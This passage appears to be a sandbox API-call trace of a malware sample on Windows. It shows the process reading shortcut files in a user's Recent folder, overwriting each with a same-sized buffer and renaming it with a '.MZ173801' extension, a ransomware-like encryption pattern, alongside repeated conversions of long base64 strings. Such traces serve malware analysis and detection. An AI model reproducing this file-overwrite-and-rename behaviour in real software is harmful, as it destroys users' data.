lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0111.092] GetCurrentThreadId () returned 0x1358 [0111.092] GetCurrentThreadId () returned 0x1358 [0111.092] GetCurrentThreadId () returned 0x1358 [0111.093] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.093] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0111.093] GetCurrentThreadId () returned 0x1358 [0111.093] GetCurrentThreadId () returned 0x1358 [0111.093] GetCurrentThreadId () returned 0x1358 [0111.093] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Roaming.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\roaming.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.093] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0111.093] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.094] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x304 [0111.094] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.094] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x304, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x304, lpOverlapped=0x0) returned 1 [0111.095] CloseHandle (hObject=0x3f4) returned 1 [0111.095] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Roaming.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\roaming.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.096] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x304, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x304, lpOverlapped=0x0) returned 1 [0111.410] CloseHandle (hObject=0x3f4) returned 1 [0111.411] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Roaming.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\roaming.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Roaming.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\roaming.lnk.mz173801")) returned 1 [0111.412] GetCurrentThreadId () returned 0x1358 [0111.412] GetCurrentThreadId () returned 0x1358 [0111.412] GetCurrentThreadId () returned 0x1358 [0111.412] GetCurrentThreadId () returned 0x1358 [0111.412] GetCurrentThreadId () returned 0x1358 [0111.412] GetCurrentThreadId () returned 0x1358 [0111.412] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x743948f8, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x743948f8, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x743948f8, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x51f, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="rUWxi6pNUN.lnk", cAlternateFileName="RUWXI6~1.LNK")) returned 1 [0111.412] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0111.412] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0111.412] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\rUWxi6pNUN.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\ruwxi6pnun.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x743948f8, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x743948f8, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x743948f8, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x51f)) returned 1 [0111.413] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.413] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0111.413] GetCurrentThreadId () returned 0x1358 [0111.413] GetCurrentThreadId () returned 0x1358 [0111.413] GetCurrentThreadId () returned 0x1358 [0111.413] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.413] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0111.414] GetCurrentThreadId () returned 0x1358 [0111.414] GetCurrentThreadId () returned 0x1358 [0111.414] GetCurrentThreadId () returned 0x1358 [0111.414] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\rUWxi6pNUN.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\ruwxi6pnun.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.414] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0111.414] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.414] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x51f [0111.414] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.414] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x51f, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x51f, lpOverlapped=0x0) returned 1 [0111.415] CloseHandle (hObject=0x3f4) returned 1 [0111.415] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\rUWxi6pNUN.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\ruwxi6pnun.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.416] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x51f, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x51f, lpOverlapped=0x0) returned 1 [0111.417] CloseHandle (hObject=0x3f4) returned 1 [0111.418] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\rUWxi6pNUN.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\ruwxi6pnun.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\rUWxi6pNUN.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\ruwxi6pnun.lnk.mz173801")) returned 1 [0111.418] GetCurrentThreadId () returned 0x1358 [0111.418] GetCurrentThreadId () returned 0x1358 [0111.418] GetCurrentThreadId () returned 0x1358 [0111.418] GetCurrentThreadId () returned 0x1358 [0111.418] GetCurrentThreadId () returned 0x1358 [0111.419] GetCurrentThreadId () returned 0x1358 [0111.419] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb0cc211, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeb0cc211, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeb0cc211, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x42b, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="s1HnMB.lnk", cAlternateFileName="")) returned 1 [0111.419] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0111.419] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0111.419] GetFileAttributesExW (in: 